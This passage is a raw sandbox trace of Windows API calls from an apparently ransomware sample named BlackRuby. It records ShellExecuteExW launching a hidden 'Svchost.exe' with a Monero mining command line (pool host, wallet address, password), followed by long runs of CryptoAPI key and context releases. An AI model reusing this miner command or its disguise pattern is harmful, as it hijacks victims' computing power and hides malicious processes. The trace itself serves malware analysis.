43DmqxU4LzuTrmA8GLZ7S5J6w32bwCavX9bhvCiSEwwebfn4TCYRAxmPtWTZq9iQ1F6XYsktJEYBYDkhKu4KXw6rCCspxCJ -p EEBsYm5:CRH2YWU7", lpDirectory="C:\\Windows\\system32\\BlackRuby", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x1bea010*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="Svchost.exe", lpParameters="-o stratum+tcp://de01.supportxmr.com:3333 -u 43DmqxU4LzuTrmA8GLZ7S5J6w32bwCavX9bhvCiSEwwebfn4TCYRAxmPtWTZq9iQ1F6XYsktJEYBYDkhKu4KXw6rCCspxCJ -p EEBsYm5:CRH2YWU7", lpDirectory="C:\\Windows\\system32\\BlackRuby", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x458)) returned 1 [0066.437] GetLastError () returned 0x0 [0066.437] LocalFree (hMem=0x3d99a0) returned 0x0 [0066.438] GetLastError () returned 0x0 [0066.438] LocalFree (hMem=0x37a8f0) returned 0x0 [0066.438] GetLastError () returned 0x0 [0066.438] LocalFree (hMem=0x3a2578) returned 0x0 [0066.438] GetLastError () returned 0x0 [0066.438] GetCurrentProcess () returned 0xffffffff [0066.438] GetLastError () returned 0x0 [0066.438] GetCurrentProcess () returned 0xffffffff [0066.438] GetLastError () returned 0x0 [0066.438] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x458, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x18ef50, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18ef50*=0x408) returned 1 [0066.438] GetLastError () returned 0x0 [0066.438] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x7fffffff, cHandles=0x1, pHandles=0x18ef78*=0x408, lpdwindex=0x18ed30 | out: lpdwindex=0x18ed30) returned 0x0 [0066.767] CloseHandle (hObject=0x408) returned 1 [0066.767] GetLastError () returned 0x0 [0066.767] CloseHandle (hObject=0x458) returned 1 [0066.767] GetLastError () returned 0x0 [0066.767] LocalAlloc (uFlags=0x0, uBytes=0x18) returned 0x3d99a0 [0066.767] RtlMoveMemory (in: Destination=0x3d99a0, Source=0x1be9678, Length=0x18 | out: Destination=0x3d99a0) [0066.767] LocalAlloc (uFlags=0x0, uBytes=0x142) returned 0x37a8f0 [0066.767] RtlMoveMemory (in: Destination=0x37a8f0, Source=0x1be9e2c, Length=0x142 | out: Destination=0x37a8f0) [0066.767] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3a2578 [0066.767] RtlMoveMemory (in: Destination=0x3a2578, Source=0x1b04e40, Length=0x3c | out: Destination=0x3a2578) [0066.767] ShellExecuteExW (pExecInfo=0x1bea0a8*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="Svchost.exe", lpParameters="-o stratum+tcp://de01.supportxmr.com:3333 -u 43DmqxU4LzuTrmA8GLZ7S5J6w32bwCavX9bhvCiSEwwebfn4TCYRAxmPtWTZq9iQ1F6XYsktJEYBYDkhKu4KXw6rCCspxCJ -p EEBsYm5:CRH2YWU7", lpDirectory="C:\\Windows\\system32\\BlackRuby", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) Thread: id = 2 os_tid = 0x9e8 Thread: id = 3 os_tid = 0x9ec [0027.031] CoGetContextToken (in: pToken=0xe5f3b8 | out: pToken=0xe5f3b8) returned 0x800401f0 [0027.031] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0044.900] CloseHandle (hObject=0x170) returned 1 [0044.900] GetLastError () returned 0x0 [0044.901] CryptDestroyKey (hKey=0x360b20) returned 1 [0044.901] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0044.901] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0044.901] CloseHandle (hObject=0x31c) returned 1 [0044.901] GetLastError () returned 0x0 [0044.901] CloseHandle (hObject=0x348) returned 1 [0044.901] GetLastError () returned 0x0 [0044.902] CloseHandle (hObject=0x250) returned 1 [0044.902] GetLastError () returned 0x0 [0044.902] CloseHandle (hObject=0x24c) returned 1 [0044.902] GetLastError () returned 0x0 [0044.902] CloseHandle (hObject=0x2ac) returned 1 [0044.902] GetLastError () returned 0x0 [0044.902] CloseHandle (hObject=0x1cc) returned 1 [0044.902] GetLastError () returned 0x0 [0044.902] CloseHandle (hObject=0x1c8) returned 1 [0044.902] GetLastError () returned 0x0 [0044.903] CloseHandle (hObject=0x2a8) returned 1 [0044.903] GetLastError () returned 0x0 [0044.903] CloseHandle (hObject=0x1c4) returned 1 [0044.903] GetLastError () returned 0x0 [0044.903] CloseHandle (hObject=0x1c0) returned 1 [0044.903] GetLastError () returned 0x0 [0044.903] CloseHandle (hObject=0x1bc) returned 1 [0044.903] GetLastError () returned 0x0 [0044.903] CloseHandle (hObject=0x1b0) returned 1 [0044.903] GetLastError () returned 0x0 [0044.904] CloseHandle (hObject=0x1ac) returned 1 [0044.904] GetLastError () returned 0x0 [0044.904] CloseHandle (hObject=0x1a8) returned 1 [0044.904] GetLastError () returned 0x0 [0044.904] CloseHandle (hObject=0x1a4) returned 1 [0044.904] GetLastError () returned 0x0 [0044.904] CloseHandle (hObject=0x1a0) returned 1 [0044.904] GetLastError () returned 0x0 [0044.905] CloseHandle (hObject=0x19c) returned 1 [0044.905] GetLastError () returned 0x0 [0044.905] CloseHandle (hObject=0x198) returned 1 [0044.905] GetLastError () returned 0x0 [0044.905] CloseHandle (hObject=0x184) returned 1 [0044.905] GetLastError () returned 0x0 [0044.984] CryptDestroyKey (hKey=0x360ae0) returned 1 [0044.984] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0044.984] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.221] CryptDestroyKey (hKey=0x360b20) returned 1 [0045.221] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.221] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.354] CryptDestroyKey (hKey=0x360c20) returned 1 [0045.354] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.354] CryptDestroyKey (hKey=0x360aa0) returned 1 [0045.355] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.355] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.355] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.478] CryptDestroyKey (hKey=0x360aa0) returned 1 [0045.478] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.478] CryptDestroyKey (hKey=0x360a20) returned 1 [0045.478] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0045.479] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0045.479] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.479] CryptDestroyKey (hKey=0x360da0) returned 1 [0045.479] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.479] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.648] CryptDestroyKey (hKey=0x360a20) returned 1 [0045.648] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.648] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.649] CryptDestroyKey (hKey=0x360e20) returned 1 [0045.649] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0045.649] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0045.649] CryptDestroyKey (hKey=0x360ce0) returned 1 [0045.649] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.649] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.867] CryptDestroyKey (hKey=0x360b20) returned 1 [0045.867] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0045.867] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0045.867] CryptDestroyKey (hKey=0x360d60) returned 1 [0045.867] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.868] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.002] CryptDestroyKey (hKey=0x360e20) returned 1 [0046.002] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.002] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.003] CryptDestroyKey (hKey=0x360d60) returned 1 [0046.003] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.003] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.150] CryptDestroyKey (hKey=0x360ea0) returned 1 [0046.150] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.151] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.151] CryptDestroyKey (hKey=0x360d20) returned 1 [0046.151] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.151] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.152] CryptDestroyKey (hKey=0x360a20) returned 1 [0046.152] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.152] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.322] CryptDestroyKey (hKey=0x360de0) returned 1 [0046.322] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.322] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.323] CryptDestroyKey (hKey=0x360b20) returned 1 [0046.323] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.323] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.460] CryptDestroyKey (hKey=0x360aa0) returned 1 [0046.460] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.460] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.461] CryptDestroyKey (hKey=0x360c20) returned 1 [0046.461] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.461] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.461] CryptDestroyKey (hKey=0x360f20) returned 1 [0046.461] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.461] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.600] CryptDestroyKey (hKey=0x360b20) returned 1 [0046.600] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.600] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.601] CryptDestroyKey (hKey=0x360e60) returned 1 [0046.601] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.601] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.774] CryptDestroyKey (hKey=0x360d60) returned 1 [0046.774] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.774] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.774] CryptDestroyKey (hKey=0x360de0) returned 1 [0046.774] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.774] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.917] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.918] CryptDestroyKey (hKey=0x360ea0) returned 1 [0046.918] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0047.069] CryptDestroyKey (hKey=0x360f60) returned 1 [0047.069] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0047.069] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0047.069] CryptDestroyKey (hKey=0x360ea0) returned 1 [0047.069] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0047.069] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0047.219] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0047.219] CryptDestroyKey (hKey=0x360ea0) returned 1 [0047.220] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.220] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.220] CryptDestroyKey (hKey=0x360ee0) returned 1 [0047.220] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0047.220] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0047.220] CryptDestroyKey (hKey=0x360f60) returned 1 [0047.220] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0047.332] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.333] CryptDestroyKey (hKey=0x360fa0) returned 1 [0047.333] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.485] CryptDestroyKey (hKey=0x360b60) returned 1 [0047.485] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.485] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.608] CryptDestroyKey (hKey=0x360a20) returned 1 [0047.608] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.608] CryptDestroyKey (hKey=0x360b20) returned 1 [0047.608] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0047.608] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0047.608] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.702] CryptDestroyKey (hKey=0x360ee0) returned 1 [0047.702] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.702] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.703] CryptDestroyKey (hKey=0x360b60) returned 1 [0047.703] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.703] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.847] CryptDestroyKey (hKey=0x360b20) returned 1 [0047.847] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.847] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.847] CryptDestroyKey (hKey=0x360da0) returned 1 [0047.847] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.848] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.946] CryptDestroyKey (hKey=0x360de0) returned 1 [0047.946] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.947] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.947] CryptDestroyKey (hKey=0x360ae0) returned 1 [0047.947] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.947] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.083] CryptDestroyKey (hKey=0x360f60) returned 1 [0048.083] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.084] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.357] CryptDestroyKey (hKey=0x360c20) returned 1 [0048.357] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0048.357] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0048.358] CryptDestroyKey (hKey=0x360b60) returned 1 [0048.358] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.358] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.494] CryptDestroyKey (hKey=0x360b20) returned 1 [0048.494] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0048.494] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0048.495] CryptDestroyKey (hKey=0x360b60) returned 1 [0048.495] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.495] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.570] CryptDestroyKey (hKey=0x360b20) returned 1 [0048.570] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.571] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.758] CryptDestroyKey (hKey=0x360ae0) returned 1 [0048.758] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.758] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0049.047] CryptDestroyKey (hKey=0x360a20) returned 1 [0049.047] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0049.047] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0049.092] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.092] CryptDestroyKey (hKey=0x360d20) returned 1 [0049.092] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.513] CryptDestroyKey (hKey=0x360fa0) returned 1 [0049.513] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.514] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.663] CryptDestroyKey (hKey=0x360ae0) returned 1 [0049.663] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.663] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.773] CryptDestroyKey (hKey=0x360fa0) returned 1 [0049.773] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.773] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.774] CryptDestroyKey (hKey=0x360ee0) returned 1 [0049.774] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0049.774] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0049.941] CryptDestroyKey (hKey=0x360ee0) returned 1 [0049.941] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0049.942] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0049.942] CryptDestroyKey (hKey=0x360fa0) returned 1 [0049.942] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0049.942] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0049.942] CryptDestroyKey (hKey=0x360ea0) returned 1 [0049.942] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.942] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.137] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.137] CryptDestroyKey (hKey=0x360de0) returned 1 [0050.137] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.137] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.138] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0050.138] CryptDestroyKey (hKey=0x360a20) returned 1 [0050.138] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0050.138] CryptDestroyKey (hKey=0x360e20) returned 1 [0050.138] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.282] CryptDestroyKey (hKey=0x3609e0) returned 1 [0050.282] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0050.283] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0050.283] CryptDestroyKey (hKey=0x360ae0) returned 1 [0050.283] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.283] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.430] CryptDestroyKey (hKey=0x360b60) returned 1 [0050.430] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0050.430] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0050.430] CryptDestroyKey (hKey=0x360c20) returned 1 [0050.430] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.430] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.525] CryptDestroyKey (hKey=0x3609e0) returned 1 [0050.525] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.525] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.526] CryptDestroyKey (hKey=0x360e20) returned 1 [0050.526] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.526] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.652] CryptDestroyKey (hKey=0x360aa0) returned 1 [0050.652] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.652] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.652] CryptDestroyKey (hKey=0x360da0) returned 1 [0050.652] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.652] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.752] CryptDestroyKey (hKey=0x360f20) returned 1 [0050.752] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.752] CryptDestroyKey (hKey=0x360e20) returned 1 [0050.752] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0050.752] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0050.752] CryptDestroyKey (hKey=0x360a20) returned 1 [0050.752] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.753] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.753] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.873] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.874] CryptDestroyKey (hKey=0x360da0) returned 1 [0050.874] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.874] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.875] CryptDestroyKey (hKey=0x360e20) returned 1 [0050.875] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.956] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.957] CryptDestroyKey (hKey=0x360e20) returned 1 [0050.957] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0050.957] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0050.957] CryptDestroyKey (hKey=0x360da0) returned 1 [0050.957] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.073] CryptDestroyKey (hKey=0x360e60) returned 1 [0051.073] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.073] CryptDestroyKey (hKey=0x360aa0) returned 1 [0051.073] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0051.073] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0051.074] CryptDestroyKey (hKey=0x360a20) returned 1 [0051.074] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.074] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.074] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.160] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0051.160] CryptDestroyKey (hKey=0x360da0) returned 1 [0051.160] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.160] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.161] CryptDestroyKey (hKey=0x360f60) returned 1 [0051.161] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0051.161] CryptDestroyKey (hKey=0x360de0) returned 1 [0051.161] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.162] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.273] CryptDestroyKey (hKey=0x360f20) returned 1 [0051.273] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0051.273] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0051.273] CryptDestroyKey (hKey=0x360b60) returned 1 [0051.273] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.274] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.385] CryptDestroyKey (hKey=0x360fa0) returned 1 [0051.385] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.385] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.386] CryptDestroyKey (hKey=0x360f60) returned 1 [0051.386] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.386] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.530] CryptDestroyKey (hKey=0x360a20) returned 1 [0051.530] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0051.530] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0051.531] CryptDestroyKey (hKey=0x360ea0) returned 1 [0051.531] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.531] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.531] CryptDestroyKey (hKey=0x360fa0) returned 1 [0051.531] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.531] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.657] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.658] CryptDestroyKey (hKey=0x3609e0) returned 1 [0051.658] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0051.658] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0051.659] CryptDestroyKey (hKey=0x360f20) returned 1 [0051.659] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.748] CryptDestroyKey (hKey=0x360a20) returned 1 [0051.748] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.748] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.748] CryptDestroyKey (hKey=0x3609e0) returned 1 [0051.748] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0051.748] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0051.749] CryptDestroyKey (hKey=0x360da0) returned 1 [0051.749] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.749] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.965] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0051.966] CryptDestroyKey (hKey=0x360b60) returned 1 [0051.966] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.966] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.967] CryptDestroyKey (hKey=0x360da0) returned 1 [0051.967] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.121] CryptDestroyKey (hKey=0x360da0) returned 1 [0052.121] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0052.121] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0052.121] CryptDestroyKey (hKey=0x360b60) returned 1 [0052.121] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.121] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.290] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.290] CryptDestroyKey (hKey=0x360ee0) returned 1 [0052.290] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.290] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0052.291] CryptDestroyKey (hKey=0x360ae0) returned 1 [0052.291] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0052.438] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0052.439] CryptDestroyKey (hKey=0x360ce0) returned 1 [0052.439] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.439] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.439] CryptDestroyKey (hKey=0x360ee0) returned 1 [0052.439] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0052.598] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.599] CryptDestroyKey (hKey=0x360ce0) returned 1 [0052.599] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.762] CryptDestroyKey (hKey=0x360a20) returned 1 [0052.762] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0052.762] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0052.763] CryptDestroyKey (hKey=0x360de0) returned 1 [0052.763] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.763] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) 